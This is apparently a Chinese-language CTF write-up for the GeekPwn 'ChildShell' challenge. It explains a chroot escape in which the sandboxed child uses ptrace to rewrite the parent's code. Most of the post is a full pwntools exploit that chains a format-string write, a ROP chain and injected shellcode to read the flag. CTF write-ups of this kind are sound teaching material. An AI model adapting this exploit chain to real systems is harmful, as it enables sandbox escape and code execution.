GeekPwn线上初赛ChildShell

使用ptrace绕过了限制,记录一下

ChildShell

赛后问了下上交的大佬,大佬和我说了下可以用ptrace来逃出去

个人觉得是因为父进程没有被chroot,被chroot的只有子进程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
v9 = _libc_fork();
if ( v9 )	// 父进程一直在等待子进程退出
{
  wait(v9, 0LL, 0);
  sub_43FF80();
}
v10 = _opendir("./sandbox");
if ( !v10 )
{
  v3 = (char *)0x16D;
  _mkdir("./sandbox", 0x16DLL);
}
if ( (unsigned int)chroot() == -1 )
  perror((__int64)"error.", (__int64)v3, v4);
if ( (unsigned int)_chdir() == -1 )
  perror((__int64)"error.", (__int64)v3, v5);
if ( (unsigned int)_setuid(0xFFFEu) == -1 )
  perror((__int64)"error.", (__int64)v3, v6);

所有我们可以在子进程里用ptrace把父进程的代码改了,然后orw读取flag

思路为:

  • getppid来获取下父进程pid
  • ptrace(PTRACE_ATTACH, ppid, NULL, NULL)attach到父进程上
  • ptrace(PTRACE_POKETEXT, ppid, addr, data)来改写父进程的代码段
  • 在调用exit让父进程从wait返回

exp为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
from pwn import *
import sys

context.arch = 'amd64'

def main(host,port=60101):
	global p
	if host:
		p = remote(host,port)
	else:
		p = process("./pwn")
		# gdb.attach(p,"b *0x40ac50\nc")
		# gdb.attach(p,"b *0x000000000400D56\nc")
	p.recvuntil("back.")
	# 0x0000000000410895: mov rdi, rbp; call qword ptr [rbp + 0x20];  ### rbp = 0x6cb0a0
	stdout_vtable = 0x6CB300+0xd8	
	fake_vtable = 0x703500+0x38
	fini_array = 0x0000000006CAEE8+8
	func = 0x0000000004009B6
	addr = 0x0000000000410895
	exit = 0x401066
	# 0x455573
	payload = "%{}c%{}$hhn%{}$hhn_%{}$hhn".format(0x40,18,19,20)
	payload += "%{}c%{}$hn%{}c%{}$hn%{}c%{}$hn%{}c%{}$hhn".format((addr&0xffff)-0x41,21,(func&0xffff)-(addr&0xffff),22,(exit&0xffff)-(func&0xffff),23,0xa,24)
	payload += "%c"*4+p64(fake_vtable+2)+p64(0x6cb0a0+0x22)+p64(fini_array+2)+p64(fini_array)+p64(0x6cb0a0+0x20)+p64(fake_vtable)+p64(stdout_vtable+2)
	pause()
	p.sendline(payload)
	p.recvuntil("message:")
	
	# 0x0000000000479976: pop rax; pop rdx; pop rbx; ret;
	# 0x0000000000468bf5: syscall; ret;
	# 0x0000000000401a36: pop rdi; ret;
	# 0x0000000000401b57: pop rsi; ret;
	# 0x0000000000443f96: pop rdx; ret;
	# 0x00000000004722b6: mov qword ptr [rdi + 0x308], rax; ret;
	# 0x00000000004a4a1f: jmp rdi;
	p_rax_pp = 0x0000000000479976
	syscall = 0x0000000000468bf5
	p_rdi = 0x0000000000401a36
	p_rsi = 0x0000000000401b57
	p_rdx = 0x0000000000443f96
	jmp_rdi = 0x00000000004a4a1f
	rop_chain = [
		p_rdi,0x700000,p_rsi,0x1000,p_rdx,7,0x0000000004415E0,
		p_rdi,0,p_rsi,0x700000,p_rax_pp,0,0x200,0,syscall,
		p_rdi,0x700000,jmp_rdi
	]
	# payload = "flag".ljust(8,"\x00")+flat(rop_chain)+'\n'
	payload = p64(0) + flat(rop_chain)
	p.sendline(payload)

	inject_code = asm(shellcraft.cat('/flag')).ljust(65,"\x90")

	template = "push 4;pop rdi;push %ld;pop rdx;mov r10,%ld;push 101;pop rax;syscall;"
	start_addr = 0x400C8C
	code = ''
	for i in range(len(inject_code)/8):
		code += template % (start_addr+i*8,u64(inject_code[i*8:i*8+8]))

	sc = """
		nop;
		nop;
		push 110;
		pop rax;
		syscall; 	
		push rax;
		pop rsi;
		push 16;
		pop rdi;
		xor rdx,rdx;
		xor r10,r10;
		push 101;
		pop rax;
		syscall;
		%s
		push 17;
		pop rdi;
		xor rdx,rdx;
		xor r10,r10;
		push 101;
		pop rax;
		syscall;
		xor rdi,rdi;
		push 60
		pop rax
		syscall
		nop;
	""" % code
	pause()
	p.send(asm(sc))
	p.interactive()
	
if __name__ == "__main__":
	# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	# elf = ELF("./pwn",checksec=False)
	main(args['REMOTE'])

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

beginner